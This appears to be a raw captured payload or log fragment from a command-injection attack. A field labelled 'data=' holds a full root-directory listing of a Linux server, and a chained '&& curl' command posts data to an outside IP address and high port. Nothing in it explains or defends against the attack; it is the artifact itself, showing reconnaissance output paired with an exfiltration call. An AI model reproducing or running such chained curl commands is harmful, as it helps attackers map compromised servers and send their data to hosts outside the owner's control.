data=total 4195104
drwxr-xr-x   2 root   root         4096 Nov  9 14:29 app
lrwxrwxrwx   1 root   root            7 Aug 10  2023 bin -> usr/bin
drwxr-xr-x   5 root   root         4096 Aug 28 06:02 boot
drwxr-xr-x  20 root   root         4520 Nov  9 12:46 dev
drwxr-xr-x 167 root   root        12288 Nov  9 00:09 etc
drwxr-xr-x  10 root   root         4096 Nov  2  2023 home
lrwxrwxrwx   1 root   root            7 Aug 10  2023 lib -> usr/lib
lrwxrwxrwx   1 root   root            9 Aug 10  2023 lib32 -> usr/lib32
lrwxrwxrwx   1 root   root            9 Aug 10  2023 lib64 -> usr/lib64
lrwxrwxrwx   1 root   root           10 Aug 10  2023 libx32 -> usr/libx32
drwx------   2 root   root        16384 Nov  2  2023 lost+found
drw-------   2 root   root         4096 Aug 10  2023 media
drwxr-xr-x   2 root   root         4096 Aug 10  2023 mnt
drwxr-xr-x  14 root   root         4096 Nov  8 13:19 opt
dr-xr-xr-x 421 root   root            0 Nov  9 00:06 proc
-r--r--r--   1 locala locala       4946 Apr 29  2023 RequestXMLSchema.xsd
drwx------  11 root   root         4096 Apr  3  2024 root
drwxr-xr-x  49 root   root         1360 Nov  9 11:20 run
lrwxrwxrwx   1 root   root            8 Aug 10  2023 sbin -> usr/sbin
-rw-r--r--   1 root   root            0 Nov  9 18:38 sn.tmp
drwxr-xr-x   2 root   root         4096 Aug 10  2023 srv
-rw-------   1 root   root   4294967296 Nov  2  2023 swap.img
dr-xr-xr-x  13 root   root            0 Nov  9 00:06 sys
drwxrwxrwt  31 root   root       733184 Nov  9 18:59 tmp
drwxr-xr-x  14 root   root         4096 Aug 10  2023 usr
drwxr-xr-x  14 root   root         4096 Mar 24  2024 var && curl 158.160.50.16:61714 -d x=
